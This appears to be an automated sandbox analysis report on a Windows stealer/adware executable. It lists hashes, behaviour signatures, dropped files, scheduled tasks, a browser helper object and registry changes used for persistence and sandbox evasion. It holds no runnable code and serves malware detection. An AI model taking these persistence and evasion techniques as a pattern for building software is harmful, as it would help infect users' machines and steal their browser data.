ddc7f4b27173a2b55af5fc5550fb41cd05d28fca932d1eb79d17bea79cc30b9c

Analysis

max time kernel
121s
max time network
117s
platform
windows10_x64
resource
win10v20210410
submitted
21-06-2021 07:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1ef565125b92bec9766369c997694ad2.exe
Size

6.2MB
MD5

1ef565125b92bec9766369c997694ad2
SHA1

9ddea371f965b67fa491141621cfb574a1e9725c
SHA256

ddc7f4b27173a2b55af5fc5550fb41cd05d28fca932d1eb79d17bea79cc30b9c
SHA512

cba1597858a6f061d967cc12e76f7d13447727a94064f6a1ee681715f509d5832181795898ec80eb53d76c37f1b3d50b0723eb80493fd1c89aa59194bc62c25e

Score

10^/10

adware discovery persistence spyware stealer

Malware Config

Signatures

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

19 3508 rundll32.exe
Executes dropped EXE 5 IoCs

Processes:

SimplInst.exeSimplInst.exeyayTXvm.exehpXbguT.exeQwrETiD.exe

pid process

364 SimplInst.exe
2192 SimplInst.exe
3128 yayTXvm.exe
3696 hpXbguT.exe
340 QwrETiD.exe

flow	pid	process
19	3508	rundll32.exe

pid	process
364	SimplInst.exe
2192	SimplInst.exe
3128	yayTXvm.exe
3696	hpXbguT.exe
340	QwrETiD.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

3508 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Drops desktop.ini file(s) 1 IoCs

Processes:

hpXbguT.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini hpXbguT.exe
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176

pid	process
3508	rundll32.exe

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	hpXbguT.exe

Drops file in System32 directory 17 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exerundll32.exepowershell.exepowershell.exeSimplInst.exepowershell.exeyayTXvm.exepowershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	rundll32.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	SimplInst.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	yayTXvm.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	yayTXvm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	rundll32.exe

Drops file in Program Files directory 64 IoCs

Processes:

hpXbguT.exe

description	ioc	process
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\es\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt_BR\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sw\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ta\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\th\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\kZGDpsH.exe	hpXbguT.exe
File created	C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\NCBdfDL.dll	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ca\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hi\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ms\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt_PT\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en_US\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\id\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ja\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\zh_CN\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\ELOJFuMDhuHU2\EaaNbrAXtDJjN.dll	hpXbguT.exe
File created	C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\hxfzsbR.xml	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ar\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fil\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\gu\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\he\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\nl\messages.json	hpXbguT.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fr\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\mr\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\tr\messages.json	hpXbguT.exe
File opened for modification	C:\Program Files (x86)\WSPNEpLqQIE\files\Kernel.js	hpXbguT.exe
File created	C:\Program Files (x86)\pQmgloyPupxgC\dOsvLJD.dll	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\bg\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\be\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ru\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\tgZBuA7n.dll	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\Kernel.js	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en_GB\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\lt\messages.json	hpXbguT.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pl\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\vi\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\pQmgloyPupxgC\TRdWGTw.xml	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ml\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ro\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sk\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sq\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sv\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\zh_TW\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\ktTXGKPDP.dll	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\et\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\el\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ko\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\te\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\anjFGKdzU\qtqQIoj.xml	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\cs\messages.json	hpXbguT.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\da\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\de\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\kn\messages.json	hpXbguT.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\bn\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fi\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hr\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\mk\messages.json	hpXbguT.exe
File created	C:\Program Files (x86)\fcsvEsvhbcUn\rgswtIU.dll	hpXbguT.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\wNQepEmyQbhZnWiRT.job	schtasks.exe
File created	C:\Windows\Tasks\bqZkKdgiyjBiVwZYfn.job	schtasks.exe
File created	C:\Windows\Tasks\jrzNdZzegeVMzeqYf.job	schtasks.exe
File created	C:\Windows\Tasks\JRajWlGIFNTafba.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1800	schtasks.exe
2152	schtasks.exe
2852	schtasks.exe
1260	schtasks.exe
3036	schtasks.exe
3276	schtasks.exe
2812	schtasks.exe
188	schtasks.exe
3772	schtasks.exe
3032	schtasks.exe
3704	schtasks.exe
840	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	SimplInst.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies Internet Explorer settings 1 TTPs 15 IoCs

adware spyware

Modify Registry

T1112

Processes:

QwrETiD.exehpXbguT.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	QwrETiD.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	QwrETiD.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	hpXbguT.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights	hpXbguT.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Approved Extensions	hpXbguT.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\WSPNEpLqQIE"	hpXbguT.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\kZGDpsH.exe = "9999"	hpXbguT.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	hpXbguT.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	hpXbguT.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "kZGDpsH.exe"	hpXbguT.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	hpXbguT.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{1A4355C3-1380-4565-8F0B-AE992134C31B} = 51667a6c4c1d3b1bd348570bb1460e0d9402efd926768604	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "kZGDpsH.exe"	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\WSPNEpLqQIE"	hpXbguT.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	hpXbguT.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exehpXbguT.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume	hpXbguT.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe

Modifies registry class 64 IoCs

Processes:

hpXbguT.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ = "YoutubeAdBlock"	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\FLAGS	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\HELPDIR	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\ktTXGKPDP.dll"	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ = "{601F87D8-13CD-4AEA-83DA-960D9654B38D}"	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib	hpXbguT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	hpXbguT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0	hpXbguT.exe
